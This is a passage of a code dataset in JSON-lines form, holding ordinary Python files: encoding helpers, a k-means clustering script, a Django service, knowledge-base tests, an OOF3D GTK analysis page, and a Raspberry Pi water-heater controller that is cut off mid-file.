encode string'\n return res\n\n def b64enc(self,string): #base64编码函数\n string=str(string)\n return base64.b64encode(string.encode('utf-8')).decode('utf-8')\n\n def urlenc(self,string): #urlencode函数\n string=str(string)\n res=urllib.parse.quote(string)\n while res[-3:]=='%0A':\n res=res[:-3]\n return res\n\n\n def urldec(self,string): #urldecode函数\n string=str(string)\n 
res=urllib.parse.unquote(string)\n while res[-3:]=='%0A':\n res=res[:-3]\n return res\n\n\n def md5enc(self,string): #计算md5值,32位小写字母\n string=str(string).encode('utf-8')\n m=hashlib.md5()\n m.update(string)\n return m.hexdigest()\n\n\n\n\nif __name__ == '__main__': \n c=coder()\n out=c.md5enc(0)\n print(out)","repo_name":"cgddgc/encodeTools","sub_path":"myCoder.py","file_name":"myCoder.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19069782104","text":"# Program that separates uppercase letters which will\n# reveal a secret message\n\n\n# Function to join all uppercase letters and then return them\ndef secretMessage (msg):\n\tmsg_decoded = ''.join(letter\n\t\tfor letter in msg\n\t\t\tif letter.isupper())\n\treturn str(msg_decoded)\n\n\n# User entered message\nmsg = raw_input('Enter your message to decoded: \\n\\n\\t')\n\n\n# Output the decoded message\nprint('\\n\\nYour secret message is ' + secretMessage(msg))","repo_name":"shaunc44/Python-Exercises","sub_path":"secretMessage.py","file_name":"secretMessage.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27964608734","text":"from sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.cluster import KMeans\nimport utils\n\ntrain_data,test_data=utils.get_corpus()\n\nvectorizer=CountVectorizer()\ntransformer=TfidfTransformer()\ntfidf=transformer.fit_transform(vectorizer.fit_transform(train_data))\nword=vectorizer.get_feature_names()\nweight=tfidf.toarray()\n\nfor i in range(len(weight)):\n for j in range(len(word)):\n getword = word[j]\n getvalue = weight[i][j]\nK = range(5,20)\nfor k in K:\n\n clf = KMeans(n_clusters = k,init='k-means++',max_iter=300,)\n s = clf.fit(weight)\n order_centroids = clf.cluster_centers_.argsort()[:, ::-1]\n terms = vectorizer.get_feature_names()\n print(\"第\" + str(k) + \"次聚类\\n\")\n for ss in range(k):\n print(\"\\nCluster %d:\" % ss, end='')\n for ind in order_centroids[ss, :10]:\n print(' %s' % terms[ind], end='')\n\n\n # train data classification\n # category=clf.predict(train_data)\n # print('classification results:',category)\n#\n# def predict(test_data):\n# pred=clf.predict(test_data)\n# print('prediction results:',pred)\n# print('similar elments:',train_data[category==pred])\n\n# train data labels\n label=[]\n for i in range(1,len(clf.labels_)):\n label.append(clf.labels_[i-1])\n\n print(clf.inertia_)\n y_pred=clf.labels_\n\n\nfrom sklearn.decomposition import PCA\npca=PCA(n_components=2)\nnewData=pca.fit_transform(weight)\n\n\ndef generate_coor(newData,y_pred,clusters):\n x = [n[0] for n in newData]\n y = [n[1] for n in newData]\n\n for i in range(clusters):\n tmpx,tmpy=[],[]\n\n\n\n\n\n\n\n#\n","repo_name":"lightningtyb/kmeans","sub_path":"kmeans_train.py","file_name":"kmeans_train.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12393005734","text":"import json\nimport random\nfrom django.utils.dateparse import parse_datetime\n\nclass ArticlesService:\n articles = []\n \n def __init__(self):\n with open('fixtures/content_api.json') as json_file:\n data = json.load(json_file)\n self.articles = data['results']\n for article in self.articles:\n article['path'] = article['path'][:-5] \n 
article['publish_at_with_time'] = parse_datetime(article['publish_at']).strftime('%B %-e, %Y at %I:%M%p')\n                article['publish_at'] = parse_datetime(article['publish_at']).strftime('%B %-e, %Y')\n                article['body'] = article['body'].replace('\\n\\n{%sfr%}\\n\\n', '')\n    \n    def find_featured_article(self, slug):\n        featuredIndex = None\n        for index in range(len(self.articles)):\n            for tag in self.articles[index]['tags']:\n                if tag['slug'] == slug:\n                    featuredIndex = index\n                    break\n            if featuredIndex is not None:\n                break\n        featuredArticle = self.articles.pop(featuredIndex)\n        return { 'featured': featuredArticle, 'others': random.sample(self.articles, 3) }\n    \n    def find_article_by_path(self, path):\n        article = None\n        for index in range(len(self.articles)):\n            if path in self.articles[index][\"path\"]:\n                article = self.articles[index]\n                break\n        return article\n    \nclass QuotesService:\n    quotes = []\n    \n    def __init__(self):\n        with open('fixtures/quotes_api.json') as json_file:\n            data = json.load(json_file)\n            for quote in data:\n                new_quote = {\n                    'name': quote['CompanyName'],\n                    'market': quote['ExchangeName'],\n                    'symbol': quote['Symbol'],\n                    'image': 'https://g.foolcdn.com/art/companylogos/mark/%s.png' % (quote['Symbol']),\n                    'currentPrice': quote['CurrentPrice']['Amount'],\n                    'change': quote['Change']['Amount'],\n                    'percentChange': self.format_percentage(quote['PercentChange']['Value']),\n                    'positive': True if quote['Change']['Amount'] > 0.0 else False\n                }\n                self.quotes.append(new_quote)\n    \n    def all_quotes(self):\n        return self.quotes\n    \n    def format_percentage(self, number):\n        percentage = float(int(number * 10000)) / 100\n        if number < 0:\n            return f'({percentage}%)'\n        else:\n            return f'{percentage}%'","repo_name":"notmarkmiranda/django_fun_times","sub_path":"articles/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1897107335","text":"\nimport pytest\nfrom emora_stdm.state_transition_dialogue_manager.knowledge_base import KnowledgeBase\n\n\ndef test_constructor():\n    kb = KnowledgeBase([\n        ('i', 'like', 'cookies'),\n        ('i', 'like', 'milk'),\n        ('i', 'type', 'person'),\n        ('i', 'type', 'living_thing'),\n        ('cookies', 'quality', 'good')\n    ])\n\ndef test_query():\n    kb = KnowledgeBase([\n        ('i', 'like', 'cookies'),\n        ('i', 'like', 'milk'),\n        ('i', 'type', 'person'),\n        ('i', 'type', 'living_thing'),\n        ('cookies', 'quality', 'good')\n    ])\n    assert kb.query('i', 'like', 'quality') == {'good'}\n\ndef test_ontology():\n    kb = KnowledgeBase([\n        ('i', 'like', 'cookies'),\n        ('i', 'like', 'milk'),\n        ('i', 'type', 'person'),\n        ('i', 'type', 'living_thing'),\n        ('cookies', 'quality', 'good')\n    ])\n    assert kb.types('i') == {'person', 'living_thing'}\n\ndef test_expressions():\n    kb = KnowledgeBase([\n        ('i', 'like', 'cookies'),\n        ('i', 'like', 'milk'),\n        ('i', 'type', 'person'),\n        ('i', 'type', 'living_thing'),\n        ('cookies', 'quality', 'good')\n    ])\n    assert kb.expressions('i') == {'i'}\n    assert kb.expressions('living_thing') == set()\n    kb.add_expression('living_thing', 'life')\n    kb.add_expression('living_thing', 'alive')\n    assert kb.expressions('living_thing') == {'life', 'alive'}","repo_name":"emora-chat/emora_stdm","sub_path":"emora_stdm/test_state_transition_dialogue_manager/test_knowledge_base.py","file_name":"test_knowledge_base.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"37"} +{"seq_id":"2139825943","text":"from ooflib.SWIG.common import switchboard\nfrom ooflib.SWIG.engine import ooferror2\nfrom ooflib.common import debug\nfrom ooflib.common import labeltree\nfrom ooflib.common import utils\nfrom ooflib.common.IO import placeholder\nfrom 
ooflib.common.IO.GUI import chooser\nfrom ooflib.common.IO.GUI import gtklogger\nfrom ooflib.common.IO.GUI import gtkutils\nfrom ooflib.common.IO.GUI import oofGUI\nfrom ooflib.common.IO.GUI import parameterwidgets\nfrom ooflib.common.IO.GUI import regclassfactory\nfrom ooflib.common.IO.GUI import tooltips\nfrom ooflib.common.IO.GUI import whowidget\nfrom ooflib.engine import analysisdomain\nfrom ooflib.engine import namedanalysis\nfrom ooflib.engine.IO import analyze\nfrom ooflib.engine.IO import analyzemenu\nfrom ooflib.engine.IO.GUI import outputdestinationwidget\nfrom ooflib.engine.IO.GUI import outputwidget\nfrom ooflib.engine.IO.GUI import sampleregclassfactory\nimport ooflib.engine.mesh\n\nimport gtk\n\n\n# A page on which various aspects of the solved mesh can be queried --\n# cross-section and statistical outputs will live here, with the\n# ability to be put into files, and so forth. \n\n# Base class for AnalyzePage and BoundaryAnalysisPage.\n## TODO: OOF3D merged the AnalyzePage and the BoundaryAnalysisPage, so\n## there's no need for the BaseAnalysisPage class.\n\n## TODO 3.1: Is it possible to make the Field choosers in the various\n## Outputs share a Parameter? Then switching from Field/Value to\n## Field/Derivative wouldn't change the Field chooser.\n\n## TODO 3.1: Add \"New\", \"Copy\" buttons, etc, to the Planar cross section\n## widget. The underlying menu items might not yet exist.\n\nclass BaseAnalysisPage(oofGUI.MainPage):\n def buildBottomRow(self, mainbox):\n # Build the bottom row of widgets, containing the named\n # analysis buttons, the Destination chooser, and the Go\n # button.\n # Box along the bottom of the page, containing Named Analyses,\n # Destination, and Go.\n hbox = gtk.HBox()\n hbox.set_homogeneous(True)\n mainbox.pack_start(hbox, expand=0, fill=0, padding=3)\n\n # Named Analyses\n nameframe = gtk.Frame(\"Named Analyses\")\n gtklogger.setWidgetName(nameframe, 'Name')\n nameframe.set_shadow_type(gtk.SHADOW_IN)\n hbox.pack_start(nameframe, expand=1, fill=1, padding=3)\n namebox = gtk.VBox(spacing=2)\n namebox.set_border_width(1)\n nameframe.add(namebox)\n \n # The namedOps_button isn't used as a button, really. It's\n # just a place to click to bring up the menu of named analysis\n # operations. 
There isn't room in the frame to make separate\n # buttons for all the operations and still display the name of\n # the current analysis, if any.\n self.namedOps_button = gtk.Button(\"Create/Delete/etc...\")\n gtklogger.setWidgetName(self.namedOps_button, \"Operations\")\n namebox.pack_start(self.namedOps_button, expand=1, fill=1)\n gtklogger.connect(self.namedOps_button, 'button-press-event', \n self.namedOpsCB)\n # Construct the menu of operations.\n self.namedOpsPopUp = gtk.Menu()\n gtklogger.newTopLevelWidget(self.namedOpsPopUp, self.menuWidgetName)\n self.namedOpsPopUp.set_screen(self.namedOps_button.get_screen())\n gtklogger.connect_passive(self.namedOpsPopUp, 'deactivate')\n self.namedOpsMenuItems = {}\n for position, (name, callback, tip) in enumerate([\n ('Create', self.createCB, \"Create a new named analysis.\"),\n ('Save', self.savenamedCB, \"Save named analysis definitions.\"),\n ('Delete', self.deleteCB, \"Delete a named analysis.\")]):\n menuitem = gtk.MenuItem()\n self.namedOpsMenuItems[name] = menuitem\n gtklogger.setWidgetName(menuitem, name)\n label = gtk.Label(name + \"...\")\n tooltips.set_tooltip_text(label, tip)\n menuitem.add(label)\n self.namedOpsPopUp.insert(menuitem, position)\n gtklogger.connect(menuitem, 'activate', callback)\n self.namedOpsPopUp.show_all()\n # Display the name of the current analysis, if it has one.\n hbox4 = gtk.HBox()\n namebox.pack_start(hbox4, expand=0, fill=0)\n hbox4.pack_start(gtk.Label(\"Current:\"), expand=0, fill=0)\n self.namedAnalysisChooser = chooser.ChooserWidget(\n [], callback=self.retrieveCB, name=\"Retrieve\")\n hbox4.pack_start(self.namedAnalysisChooser.gtk, expand=1, fill=1)\n\n # reduce no. of calls to setNamedAnalysisChooser\n self.suppressRetrievalLoop = False\n\n # Destination\n destinationframe = gtk.Frame(\"Destination\")\n destinationframe.set_shadow_type(gtk.SHADOW_IN)\n hbox.pack_start(destinationframe, expand=1, fill=1, padding=3)\n destbox = gtk.HBox()\n destbox.set_border_width(1)\n destinationframe.add(destbox)\n\n self.destwidget = outputdestinationwidget.TextDestinationWidget(\n name=\"Destination\", framed=False)\n destbox.pack_start(self.destwidget.gtk, expand=1, fill=1, padding=2)\n \n # Go button\n self.go_button = gtkutils.StockButton(gtk.STOCK_EXECUTE, \"Go\")\n self.go_button.set_border_width(2)\n gtklogger.setWidgetName(self.go_button, 'Go')\n gtklogger.connect(self.go_button, \"clicked\", self.go_buttonCB)\n tooltips.set_tooltip_text(self.go_button,\n \"Send the output to the destination.\")\n hbox.pack_start(self.go_button, fill=1, expand=1, padding=2)\n\n\n def namedOpsCB(self, gtkbutton, event):\n self.namedOpsPopUp.popup(None, None, None, event.button, event.time)\n \n def sensitizeBottomRow(self, createOK, namedOK):\n self.namedOpsMenuItems['Create'].set_sensitive(createOK)\n self.namedOpsMenuItems['Delete'].set_sensitive(namedOK)\n self.namedOpsMenuItems['Save'].set_sensitive(namedOK)\n\n#=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=#\n\nclass DataOperationFactory(regclassfactory.RegisteredClassFactory):\n def __init__(self, page, *args, **kwargs):\n self.page = page\n regclassfactory.RegisteredClassFactory.__init__(self, *args, **kwargs)\n def includeRegistration(self, registration):\n return registration.acceptsOutput(self.page.getOutput())\n\n#=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=#\n\npshrink = False # can the HPaneds shrink below the size of their contents?\n\nclass AnalyzePage(BaseAnalysisPage):\n def __init__(self):\n 
oofGUI.MainPage.__init__(\n self, name=\"Analysis\", ordering=259,\n tip=\"Query the mesh, examine fields and fluxes.\")\n \n self.timeparam = placeholder.TimeParameter('time', value=0.0)\n\n mainbox = gtk.VBox()\n self.gtk.add(mainbox)\n\n align = gtk.Alignment(xalign=0.5)\n mainbox.pack_start(align, expand=0, fill=0)\n centerbox = gtk.HBox(spacing=3)\n align.add(centerbox)\n self.meshwidget = whowidget.WhoWidget(ooflib.engine.mesh.meshes,\n scope=self)\n # The mesh widget callback is not required, because the field\n # and flux widgets in the \"output\" widget (which are members\n # of a parameter table, which is a component of the\n # OutputWidget) are context-sensitive and update themselves\n # automatically.\n label = gtk.Label(\"Microstructure=\")\n label.set_alignment(1.0, 0.5)\n centerbox.pack_start(label, expand=0, fill=0)\n centerbox.pack_start(self.meshwidget.gtk[0], expand=0, fill=0)\n label = gtk.Label(\"Skeleton=\")\n label.set_alignment(1.0, 0.5)\n centerbox.pack_start(label, expand=0, fill=0)\n centerbox.pack_start(self.meshwidget.gtk[1], expand=0, fill=0)\n label = gtk.Label(\"Mesh=\")\n label.set_alignment(1.0, 0.5)\n centerbox.pack_start(label, expand=0, fill=0)\n centerbox.pack_start(self.meshwidget.gtk[2], expand=0, fill=0)\n\n align = gtk.Alignment(xalign=0.5)\n mainbox.pack_start(align, expand=0, fill=0)\n centerbox = gtk.HBox(spacing=3)\n align.add(centerbox)\n self.timeWidget = self.timeparam.makeWidget(scope=self)\n centerbox.pack_start(gtk.Label(\"Time:\"), expand=0, fill=0)\n centerbox.pack_start(self.timeWidget.gtk, expand=0, fill=0)\n\n mainvpane = gtk.VPaned()\n mainbox.pack_start(mainvpane, expand=1, fill=1)\n self.topPane = gtk.HPaned()\n gtklogger.setWidgetName(self.topPane, 'top')\n mainvpane.pack1(self.topPane, resize=1, shrink=0)\n self.btmPane = gtk.HPaned()\n gtklogger.setWidgetName(self.btmPane, 'bottom')\n mainvpane.pack2(self.btmPane, resize=1, shrink=0)\n # The four panes (Output, Domain, Operation, and Sampling) are\n # contained in the top and bottom HPaneds. 
The dividers\n        # between the sub panes are synchronized with each other.\n        # Since Paneds don't have a dedicated signal indicating that\n        # their dividers have been moved, we have to use the\n        # generic 'notify' signal.\n        self.paneSignals = {\n            self.topPane : gtklogger.connect(self.topPane,\n                                             'notify::position', \n                                             self.paneMovedCB,\n                                             self.btmPane),\n            self.btmPane : gtklogger.connect(self.btmPane,\n                                             'notify::position',\n                                             self.paneMovedCB,\n                                             self.topPane)\n            }\n\n        # Output\n        self.outputframe = gtk.Frame(label=\"Output\")\n        self.outputframe.set_shadow_type(gtk.SHADOW_IN)\n        output_scroll = gtk.ScrolledWindow()\n        gtklogger.logScrollBars(output_scroll, \"Output\")\n        output_scroll.set_policy(gtk.POLICY_NEVER, gtk.POLICY_AUTOMATIC)\n        self.outputframe.add(output_scroll)\n        output_box = gtk.VBox()\n\n        self.output_obj = outputwidget.ValueOutputParameterWidget(\n            value=None, scope=self, name=\"Outputs\")\n        output_box.pack_start(self.output_obj.gtk, expand=0, fill=0)\n        \n        output_scroll.add_with_viewport(output_box)\n        self.topPane.pack1(self.outputframe, resize=1, shrink=pshrink)\n\n        # Operation\n        self.operationframe = gtk.Frame(label=\"Operation\")\n        self.operationframe.set_shadow_type(gtk.SHADOW_IN)\n        op_scroll = gtk.ScrolledWindow()\n        gtklogger.logScrollBars(op_scroll, \"Operation\")\n        op_scroll.set_policy(gtk.POLICY_NEVER, gtk.POLICY_AUTOMATIC)\n        self.op_obj = DataOperationFactory(\n            page=self, registry=analyze.DataOperation.registry,\n            scope=self, name=\"OperationRCF\", callback=self.newOperationCB)\n        self.operationframe.add(op_scroll)\n\n        operation_box = gtk.VBox()\n        operation_box.pack_start(self.op_obj.gtk, expand=0, fill=0)\n        op_scroll.add_with_viewport(operation_box)\n        self.btmPane.pack1(self.operationframe, resize=1, shrink=pshrink)\n\n        # Domain\n        self.domainframe = gtk.Frame(label=\"Domain\")\n        self.domainframe.set_shadow_type(gtk.SHADOW_IN)\n        dom_scroll = gtk.ScrolledWindow()\n        gtklogger.logScrollBars(dom_scroll, \"Domain\")\n        dom_scroll.set_policy(gtk.POLICY_NEVER, gtk.POLICY_AUTOMATIC)\n        self.domain_obj = regclassfactory.RegisteredClassFactory(\n            analysisdomain.Domain.registry, scope=self, name=\"DomainRCF\",\n            callback = self.newDomainCB)\n        self.domainframe.add(dom_scroll)\n        dom_scroll.add_with_viewport(self.domain_obj.gtk)\n        self.topPane.pack2(self.domainframe, resize=1, shrink=pshrink)\n        \n        # Sampling. The SampleRCF class uses the WidgetScope\n        # mechanism to find the Operation and Domain widgets, so that\n        # it can display only the relevant SampleSet classes. 
\n self.sampleframe = gtk.Frame(label=\"Sampling\")\n self.sampleframe.set_shadow_type(gtk.SHADOW_IN)\n sam_scroll = gtk.ScrolledWindow()\n gtklogger.logScrollBars(sam_scroll, \"Sampling\")\n sam_scroll.set_policy(gtk.POLICY_NEVER, gtk.POLICY_AUTOMATIC)\n self.sample_obj = sampleregclassfactory.SampleRCF(\n scope=self, name=\"Sampling\", callback=self.newSampleCB)\n self.sampleframe.add(sam_scroll)\n sam_scroll.add_with_viewport(self.sample_obj.gtk)\n self.btmPane.pack2(self.sampleframe, resize=1, shrink=pshrink)\n\n self.buildBottomRow(mainbox)\n \n # Whenever fields or fluxes are defined or undefined on the\n # mesh, we need to update the output object widget, and\n # possibly invalidate the currently-displayed data, once we\n # start displaying data.\n\n switchboard.requestCallbackMain((\"new who\", \"Mesh\"), self.new_mesh)\n switchboard.requestCallbackMain((\"new who\", \"Skeleton\"), self.new_skel)\n \n switchboard.requestCallbackMain(self.timeWidget, self.sensitize_widgets)\n switchboard.requestCallbackMain(self.domain_obj, self.sensitize_widgets)\n switchboard.requestCallbackMain(self.op_obj, self.sensitize_widgets)\n # switchboard.requestCallbackMain(self.output_obj,\n # self.sensitize_widgets)\n switchboard.requestCallbackMain(self.output_obj,\n self.updateOperations)\n switchboard.requestCallbackMain(self.destwidget, self.sensitize_widgets)\n\n switchboard.requestCallbackMain(\"named analyses changed\",\n self.analysesChanged)\n switchboard.requestCallbackMain(\"mesh status changed\",\n self.sensitize_widgets)\n\n switchboard.requestCallbackMain(self.domain_obj,\n self.setNamedAnalysisChooser)\n switchboard.requestCallbackMain(self.op_obj,\n self.setNamedAnalysisChooser)\n switchboard.requestCallbackMain(self.output_obj,\n self.setNamedAnalysisChooser)\n switchboard.requestCallbackMain(self.sample_obj,\n self.setNamedAnalysisChooser)\n menuWidgetName = 'NamedOpsMenu'\n \n def installed(self):\n self.sensitize_widgets()\n# # Compute an initial width for the HPanes that is big enough\n# # for the separators to be synchronized without shrinking the\n# # subpanes.\n# outputwidth = self.outputframe.size_request()[0]\n# opertnwidth = self.operationframe.size_request()[0]\n# domainwidth = self.domainframe.size_request()[0]\n# samplewidth = self.sampleframe.size_request()[0]\n# # Size of separator between the panes. 
Setting it cleverly\n# # doesn't seem to do anything different than setting it to a\n# # guess.\n# gutterwidth = min(\n# self.topPane.size_request()[0] - outputwidth - domainwidth,\n# self.btmPane.size_request()[0] - opertnwidth - samplewidth)\n# debug.fmsg(\"topPane\", self.topPane.size_request(),\n# \"output\", outputwidth, \"domain\", domainwidth)\n# debug.fmsg(\"btmPane\", self.btmPane.size_request(), \n# \"operation\", opertnwidth, \"sample\", samplewidth)\n# debug.fmsg(\"gutterwidth=\", gutterwidth)\n# # gutterwidth = 5\n# totalwidth = (max(outputwidth, opertnwidth) +\n# max(domainwidth, samplewidth) +\n# gutterwidth)\n# debug.fmsg(\"totalwidth\", totalwidth)\n# self.topPane.set_size_request(totalwidth, -1)\n# self.btmPane.set_size_request(totalwidth, -1)\n# self.topPane.set_position(self.btmPane.get_position())\n\n # Synchronize the top and bottom panes\n synccount = 0 # suppresses recursion \n def paneMovedCB(self, pane, gparamspec, otherpane):\n self.synccount += 1\n if self.synccount == 1:\n pos = pane.get_position()\n # Try to move the other pane to the position of the one\n # that just moved and triggered this callback.\n self._setPanePos(otherpane, pos)\n # The other pane may not have been able to move far\n # enough. If it didn't make it, move this pane back to\n # keep them synchronized. If this causes objectionable\n # flicker, just comment out the following line.\n# self._setPanePos(pane, otherpane.get_position())\n elif self.synccount > 1:\n self.synccount = 0\n def _setPanePos(self, pane, pos):\n self.paneSignals[pane].block()\n try:\n pane.set_position(pos)\n finally:\n self.paneSignals[pane].unblock()\n def currentMeshContext(self):\n meshname = self.meshwidget.get_value()\n try:\n return ooflib.engine.mesh.meshes[meshname]\n except KeyError:\n return None\n \n def sensitize_widgets(self, *args):\n debug.mainthreadTest()\n meshctxt = self.currentMeshContext()\n meshok = meshctxt and not meshctxt.outOfSync()\n go_sensitive = bool(\n meshok and \n self.op_obj.isValid() and\n self.output_obj.isValid() and \n self.destwidget.isValid() and\n self.domain_obj.isValid() and \n self.sample_obj.isValid() and\n self.timeWidget.isValid() and\n self.domain_obj.get_value().compatible(self.output_obj.get_value())\n )\n \n self.go_button.set_sensitive(go_sensitive)\n namedok = len(namedanalysis.analysisNames()) > 0\n self.sensitizeBottomRow(go_sensitive, namedok)\n self.namedAnalysisChooser.gtk.set_sensitive(namedok)\n\n def updateOperations(self, gtkobj):\n self.op_obj.refresh()\n self.sensitize_widgets()\n\n def getOutput(self):\n return self.output_obj.get_value()\n\n def analysesChanged(self, *args):\n self.sensitize_widgets()\n self.setNamedAnalysisChooser()\n\n # Switchboard, (\"new who\", \"Mesh\")\n def new_mesh(self, mesh):\n path = labeltree.makePath(mesh)\n self.meshwidget.set_value(path)\n self.sensitize_widgets()\n\n def new_skel(self, skeleton): # switchboard (\"new who\", \"Skeleton\")\n # Switch automatically to a new Skeleton only if there is no\n # current Mesh.\n if not self.meshwidget.get_value(): # no mesh\n self.meshwidget.set_value(skeleton)\n\n # Callback from \"operation\" registered callback.\n def newOperationCB(self, registration):\n self.sensitize_widgets()\n\n def newDomainCB(self, registration):\n self.sensitize_widgets()\n\n def newSampleCB(self, registration):\n self.sensitize_widgets()\n\n #=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=#\n\n # Manipulation of named analyses.\n\n def setNamedAnalysisChooser(self, *args):\n if 
self.suppressRetrievalLoop:\n return\n # Display the name for the current analysis if the current\n # settings happen to match a named analysis. Call this\n # whenever anything on the page changes.\n \n self.namedAnalysisChooser.update(['']\n + namedanalysis.analysisNames())\n\n # If the get_value calls fail, the widgets aren't in a valid\n # state, and therefore there's no current name.\n # findNamedAnalysis returns \"\" if it can't find a match.\n try:\n currentname = namedanalysis.findNamedAnalysis(\n self.op_obj.get_value(),\n self.output_obj.get_value(),\n self.domain_obj.get_value(),\n self.sample_obj.get_value())\n except:\n currentname = \"\"\n self.namedAnalysisChooser.set_state(currentname)\n gtklogger.checkpoint(\"named analysis chooser set\")\n\n def createCB(self, gtkobj): # create a named analysis\n menuitem = analyzemenu.namedanalysismenu.Create\n if parameterwidgets.getParameters(menuitem.get_arg('name'),\n title='Name an analysis operation',\n scope=self):\n menuitem.callWithDefaults(\n operation=self.op_obj.get_value(),\n data=self.output_obj.get_value(),\n domain=self.domain_obj.get_value(),\n sampling=self.sample_obj.get_value())\n \n def deleteCB(self, gtkobj): # delete named analysis\n menuitem = analyzemenu.namedanalysismenu.Delete\n if parameterwidgets.getParameters(menuitem.get_arg('name'), \n title='Delete a named analysis',\n scope=self):\n menuitem.callWithDefaults()\n\n def retrieveCB(self, gtkobj, name): # retrieve named analysis\n if name: # can be empty\n analysis = namedanalysis.getNamedAnalysis(name)\n self.suppressRetrievalLoop = True\n try:\n self.op_obj.set(analysis.operation, interactive=False)\n self.output_obj.set_value(analysis.data)\n self.domain_obj.set(analysis.domain, interactive=False)\n self.sample_obj.set(analysis.sampling, interactive=False)\n finally:\n self.suppressRetrievalLoop = False\n gtklogger.checkpoint(\"retrieved named analysis\")\n\n def savenamedCB(self, gtkobj): # save named analysis defs to a file\n menuitem = analyzemenu.namedanalysismenu.SaveAnalysisDefs\n if parameterwidgets.getParameters(title=\"Save Analysis Definitions\",\n ident=\"SaveAnalysis\",\n *menuitem.params):\n menuitem.callWithDefaults()\n\n #=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=##=--=#\n\n # \"Go\" button callback -- fill in the basic parameters, and\n # perform the action.\n def go_buttonCB(self, gtkobj):\n op_reg = self.op_obj.get_value()\n regname = op_reg.getRegistration().name()\n menuitem = analyzemenu.ops_menu.getItem(\n utils.space2underscore(regname))\n\n menuitem.callWithDefaults(mesh=self.meshwidget.get_value(),\n time=self.timeWidget.get_value(),\n data=self.output_obj.get_value(),\n domain=self.domain_obj.get_value(),\n sampling=self.sample_obj.get_value(),\n destination=self.destwidget.get_value())\n \n\n \nanalyzepage = AnalyzePage()\n","repo_name":"usnistgov/OOF3D","sub_path":"SRC/engine/IO/GUI/analyzePage.py","file_name":"analyzePage.py","file_ext":"py","file_size_in_byte":22867,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"37"} +{"seq_id":"40313110156","text":"import os\nimport glob\nfrom time import time, sleep\nimport RPi.GPIO as GPIO\nimport csv\nimport pandas as pd\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n#Initialize GPIO\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\nFMPIN = 6 #flow meter GPIO pin\nVPIN = 12 #valve GPIO pin\nHEPIN = 25 #heating element pin\nTSPIN = 23 #temperature sensor 
pin\nGPIO.setup(FMPIN, GPIO.IN, GPIO.PUD_UP) #setup flow meter pin as input\nGPIO.setup(VPIN, GPIO.OUT, initial=GPIO.LOW) #setup valve pin as output\nGPIO.add_event_detect(FMPIN, GPIO.RISING) #add rising edge detection\nGPIO.setup(HEPIN, GPIO.OUT, initial=GPIO.LOW) #setup heating element pin as output\nGPIO.setup(TSPIN, GPIO.IN, pull_up_down=GPIO.PUD_UP) #setup temp. sensor pin as input\n\n#Initialize temperature sensor\nos.system('modprobe w1-gpio')\nos.system('modprobe w1-therm')\nbase_dir = '/sys/bus/w1/devices/'\ndevice_folder = glob.glob(base_dir + '28-00043e9dc3ff')[0]\ndevice_file = device_folder + '/w1_slave'\n\n#Define functions for reading from temperature sensor\ndef read_temp_raw():\n    f = open(device_file, 'r')\n    lines = f.readlines()\n    f.close()\n    return lines\n\ndef read_temp():\n    lines = read_temp_raw()\n    while lines[0].strip()[-3:] != 'YES':\n        sleep(0.2) #use the sleep imported from time (time itself was imported as a function)\n        lines = read_temp_raw()\n    equals_pos = lines[1].find('t=')\n    if equals_pos != -1:\n        temp_string = lines[1][equals_pos+2:]\n        temp_c = float(temp_string) / 1000.0\n        temp_f = temp_c * 9.0 / 5.0 + 32.0\n        return temp_f\n\n#Define function to draw water\ndef draw_water(target):\n    if target == 0:\n        print('No draw for this hour')\n        return\n    print ('Drawing %.2f gallon(s).' % target)\n    volume = 0\n    numPulses = 0\n    GPIO.output(VPIN, GPIO.HIGH) #open valve\n    while volume < target: #keep valve open until desired volume has passed\n        if GPIO.event_detected(FMPIN):\n            numPulses += 1 #Count pulses from flow meter\n            volume = float(numPulses) / 476 #Calculate volume\n    GPIO.output(VPIN, GPIO.LOW) #close valve\n    print ('Volume drawn: %.2f gallon(s).' % volume)\n\n#Read csv file with daily usage profile (one column for hours, one for gallons)\ndp = pd.read_csv('DailyProfile.csv')\nhours = []\ngallons = []\nrow = 0\nwhile row < len(dp):\n    hours.append(dp.get_value(row,'Hour '))\n    gallons.append(dp.get_value(row,'gallons'))\n    row += 1\n\n#Create file for temperature sensor data\nPATH = 'Waterheater_Data.csv'\nif os.path.isfile(PATH):\n    print('A temperature data log already exists and will be overwritten.')\nelse:\n    print('No temperature data log exists. 
A new one will be created')\ndata = open('Waterheater_Data.csv', 'w')\ndata.write('Time, Temperature\\n')\ndata.close()\n\n#Initialize plot figure\nfig = plt.figure()\nax1 = fig.add_subplot(1,1,1)\n\n#Define function to animate plot\ndef animate(i):\n    pullData = open('Waterheater_Data.csv','r').read()\n    dataArray = pullData.split('\\n')\n    temps = []\n    for eachLine in dataArray:\n        if len(eachLine)>1:\n            x,y = eachLine.split(',')\n            if x[0].isdigit():\n                temps.append(float(y))\n    ax1.clear()\n    ax1.plot(temps)\n\n\nstate = 0 #Variable to mark heating element state (0 is off)\n#Enter main program loop\nwhile True:\n    now = datetime.now() #Update time\n    new_row = str() #Initialize string for new data row\n\n    #Read temperature sensor, and adjust heating element if too hot or cold\n    temp = read_temp()\n    if temp > 120 and state == 1:\n        GPIO.output(HEPIN, GPIO.LOW)\n        state = 0\n        print('Temperature has exceeded 120 degrees - turning off heating element.')\n    elif temp < 